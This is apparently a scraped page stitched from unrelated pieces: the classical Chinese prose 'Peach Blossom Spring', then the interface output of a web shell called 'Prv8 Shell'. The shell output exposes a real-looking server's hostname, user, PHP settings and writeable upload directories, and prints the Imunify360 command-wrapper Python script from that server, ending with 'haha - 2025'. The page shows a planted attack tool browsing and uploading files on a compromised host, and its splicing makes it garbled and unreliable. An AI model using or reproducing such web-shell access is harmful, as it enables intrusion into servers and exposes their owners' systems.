晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。   林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。   见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝)   既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。   南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。 .
Prv8 Shell
Server : Apache
System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64
User : rainic ( 1014)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /usr/bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/bin/imunify360-command-wrapper
#!/opt/imunify360/venv/bin/python3

import base64
import subprocess
import json
import os
import fileinput
import socket
import select
import shutil
import random
import string
import sys
from urllib.parse import urlencode

# This code is duplicated in installation.py because the execute.py file is
# copied into the /usr/bin directory in the .spec. To handle it we could:
# 1. Create a package in /opt/alt, but:
#     1.1 In the Plesk extension case python38 is installed after this code
# 2. Save the code in var/etc directories and use the symlink technique, but:
#     2.1 Again, the Plesk extension
#     2.2 Symlinks may be disabled in the system
#         (so end users will not be able to use the extension)
#     2.3 These directories are not intended for such usage
#         (var is even deletable)
# 3. Store these files in a new place in each extension
#     3.1 There are 4 extensions * 2 OS types
# also present in installation.py


class Status:
    """String constants naming the agent states reported by get_status()."""

    # Returned when "i360deploy.sh" shows up in the `ps ax` output.
    INSTALLING = "installing"
    # Returned when the agent RPC socket accepts a connection and becomes
    # readable within the timeout.
    OK = "running"
    # Returned when none of the other checks in get_status() match.
    NOT_INSTALLED = "not_installed"
    # Returned when the agent binary is absent but the Plesk module's
    # installation.log exists.
    FAILED_TO_INSTALL = "failed_to_install"
    # Returned when the socket check fails but /usr/bin/imunify360-agent
    # exists.
    STOPPED = "stopped"


def get_status():
    """Report the installation/runtime state of the agent.

    The checks run in this order:

    1. ``i360deploy.sh`` appears in ``ps ax`` -> ``Status.INSTALLING``
    2. the root RPC socket accepts a connection and becomes readable
       within 5 seconds -> ``Status.OK``
    3. ``/usr/bin/imunify360-agent`` exists -> ``Status.STOPPED``
    4. the Plesk module ``installation.log`` exists
       -> ``Status.FAILED_TO_INSTALL``
    5. otherwise -> ``Status.NOT_INSTALLED``

    Returns:
        One of the ``Status`` string constants.

    Raises:
        OSError: if ``ps`` cannot be started; this is not handled here.
    """
    # run() waits for ps to exit and closes the pipe, so neither a zombie
    # process nor an open file descriptor is left behind.
    ps_output = subprocess.run(
        ["ps", "ax"], stdout=subprocess.PIPE
    ).stdout
    # Search the raw bytes: decoding could fail on a process name that is
    # not valid UTF-8, and the needle is plain ASCII anyway.
    if b"i360deploy.sh" in ps_output:
        return Status.INSTALLING

    try:
        with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as sock:
            sock.connect("/var/run/defence360agent/simple_rpc.sock")
            readable, _, _ = select.select([sock.fileno()], [], [], 5)
            if sock.fileno() not in readable:
                raise Exception("Socket is not ready")
            return Status.OK
    except Exception:
        # Any failure to reach the agent means it is not running; decide
        # between stopped / failed install / not installed from the files
        # present on disk.
        if os.path.exists("/usr/bin/imunify360-agent"):
            return Status.STOPPED
        if os.path.exists(
            "/usr/local/psa/var/modules/imunify360/installation.log"
        ):
            return Status.FAILED_TO_INSTALL
        return Status.NOT_INSTALLED


# Unix socket paths used by execute(): the first is chosen when
# os.getegid() == 0, the second otherwise.
SOCKET_PATH_ROOT = "/var/run/defence360agent/simple_rpc.sock"
SOCKET_PATH_USER = "/var/run/defence360agent/non_root_simple_rpc.sock"


class ExecuteError(Exception):
    """Exception whose text form carries an ``ExecuteError: `` prefix."""

    def __str__(self):
        base_message = super().__str__()
        return "ExecuteError: {}".format(base_message)


def execute(command):
    """Send one command line to the agent RPC socket and print the reply.

    The command is written followed by a newline, then a single response
    line is read and printed as-is (including whatever line ending the
    peer sent).

    Args:
        command: text to send; it is encoded with ``str.encode``.

    Raises:
        Exception: "Request timeout" if the socket does not become
            readable within 180 seconds, or "Empty response from socket"
            if the peer closes without sending anything.

    If the socket is missing or refuses the connection, no exception is
    raised; an error JSON document containing ``get_status()`` is printed
    instead.
    """
    # NOTE(review): this tests the effective *group* id, not the user id --
    # confirm that is intended.
    socket_path = SOCKET_PATH_ROOT if os.getegid() == 0 else SOCKET_PATH_USER

    try:
        with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as sock:
            sock.connect(socket_path)
            sock.sendall(str.encode(command) + b"\n")

            readable, _, _ = select.select([sock.fileno()], [], [], 180)
            if sock.fileno() not in readable:
                raise Exception("Request timeout")

            # Close the file wrapper explicitly: while it is open it keeps
            # a reference to the socket, which defers the real close.
            with sock.makefile(encoding="utf-8") as reader:
                response = reader.readline()
            if not response:
                raise Exception("Empty response from socket")

            print(response)
    except (ConnectionRefusedError, FileNotFoundError):
        # The agent is unreachable: report why via get_status().
        print(
            json.dumps(
                dict(
                    result="error",
                    messages=[],
                    data=None,
                    status=get_status(),
                )
            )
        )


def upload_file(params):
    """Move uploaded files into the uploads directory and zip them.

    Each file is moved to ``/var/imunify360/uploads``, chowned to 0:0 and
    chmodded to 0600. All moved files are then packed (and removed, via
    ``zip -m``) into a randomly named password-protected archive in the
    same directory, and a success JSON document with the archive path is
    printed.

    Args:
        params: JSON text. Its optional ``"files"`` object maps a source
            path to the file name to store it under.

    Raises:
        ValueError: if a destination name has no usable final path
            component (empty, ``.`` or ``..``). All names are validated
            before any file is moved.
        OSError: if moving, chown or chmod fails (for example when ``zip``
            did not produce the archive).
    """
    upload_path = "/var/imunify360/uploads"
    upload_dir = upload_path.encode("utf-8")
    requested = json.loads(params).get("files", {})

    # The destination name comes from the caller. Keep only its final
    # component so an absolute path or "../" cannot place the file outside
    # the uploads directory.
    moves = []
    for tmp_path, file_name in requested.items():
        safe_name = os.path.basename(file_name.encode("utf-8"))
        if safe_name in (b"", b".", b".."):
            raise ValueError(
                "Invalid upload file name: {!r}".format(file_name)
            )
        moves.append(
            (tmp_path.encode("utf-8"), os.path.join(upload_dir, safe_name))
        )

    uploaded = []
    for source, destination in moves:
        shutil.move(source, destination)
        os.chown(destination, 0, 0)
        os.chmod(destination, 0o600)
        uploaded.append(destination)

    random_name = "".join(
        random.choice(string.ascii_uppercase + string.digits)
        for _ in range(8)
    )
    zip_path = os.path.join(upload_path, random_name + ".zip")
    # -j stores the files without directory components, -m deletes the
    # originals once they are in the archive.
    subprocess.call(
        ["zip", "-j", "-m", "--password", "1", zip_path] + uploaded,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.STDOUT,
        shell=False,
    )
    os.chown(zip_path, 0, 0)
    os.chmod(zip_path, 0o600)

    result = {
        "result": "success",
        "data": zip_path,
    }

    print(json.dumps(result))


#  Imunify Email

# Unix socket used by imunifyemail() to reach the quarantine HTTP API.
IMUNIFYEMAIL_SOCKET_PATH = "/var/run/imunifyemail/quarantine.sock"

# urllib3 is imported, and HttpUdsConnection defined, only when the socket
# exists at import time; otherwise the name HttpUdsConnection is undefined.
if os.path.exists(IMUNIFYEMAIL_SOCKET_PATH):
    import urllib3.connection

    class HttpUdsConnection(urllib3.connection.HTTPConnection):
        """HTTPConnection that connects over a Unix domain socket."""

        def __init__(self, socket_path, *args, **kw):
            # Remember the socket path; remaining arguments go to the
            # parent constructor unchanged.
            self.socket_path = socket_path
            super().__init__(*args, **kw)

        def connect(self):
            # Replace the parent's connect with an AF_UNIX stream socket
            # connected to socket_path.
            self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            self.sock.connect(self.socket_path)


def imunifyemail(command):
    """Forward a request to the quarantine HTTP API and print the outcome.

    Args:
        command: JSON text with the keys read below:
            ``"command"`` (list of path segments appended to
            ``/quarantine/api/v1/``), ``"username"`` (substituted for
            ``{account_name}`` in the path) and ``"params"`` (dict; its
            ``"request_method"`` is the HTTP verb, and the whole dict is
            sent both as the query string and as the JSON body).

    Prints a JSON document: ``result="success"`` with the decoded payload
    on HTTP 200, otherwise ``result="error"``. A failure while sending the
    request is printed as an error document too. Failures while reading or
    decoding the response propagate to the caller.
    """
    command = json.loads(command)
    con = HttpUdsConnection(IMUNIFYEMAIL_SOCKET_PATH, "localhost")
    try:
        url = ("/quarantine/api/v1/" + "/".join(command["command"])).format(
            account_name=command["username"]
        )
        try:
            con.request(
                command["params"]["request_method"].upper(),
                url + "?" + urlencode(command["params"], doseq=True),
                body=json.dumps(command["params"]),
            )
        except Exception as e:
            print(
                json.dumps(
                    {
                        "messages": str(e),
                        "result": "error",
                    }
                )
            )
            return

        data = []
        response = con.getresponse()
        response_text = response.read()
        if response_text:
            response_text = json.loads(response_text) or []
            # A payload without "items" is wrapped so "data" always has
            # the {"items": ...} shape when a body was returned.
            if "items" in response_text:
                data = response_text
            else:
                data = dict(items=response_text)

        if response.status == 200:
            print(
                json.dumps(
                    dict(
                        result="success",
                        messages="",
                        status=response.status,
                        data=data,
                    )
                )
            )
        else:
            print(
                json.dumps(
                    dict(
                        result="error",
                        messages="Something went wrong please try again",
                        status=response.status,
                    )
                )
            )
    finally:
        # Release the Unix socket on every path, including early return
        # and propagated exceptions.
        con.close()


if __name__ == "__main__":
    # Usage: <script> ACTION [FILE ...]
    # The first line of the given files (stdin when none are given) is a
    # base64-encoded payload handed to the handler selected by ACTION.
    # Unknown actions fall back to execute().
    dispatcher = {
        "execute": execute,
        "uploadFile": upload_file,
        "imunifyEmail": imunifyemail,
    }

    try:
        # Argument parsing and decoding sit inside the try so that a bad
        # invocation is reported as JSON like any other failure, rather
        # than as a traceback.
        if len(sys.argv) < 2:
            raise ValueError("Missing action argument")
        action = sys.argv[1]
        with fileinput.input(files=sys.argv[2:]) as stream:
            encoded_data = stream.readline()
        data = base64.b64decode(encoded_data).decode()
        dispatcher.get(action, execute)(data)
    except Exception as e:
        print(
            json.dumps(
                {
                    "messages": str(e),
                    "result": "error",
                }
            )
        )

haha - 2025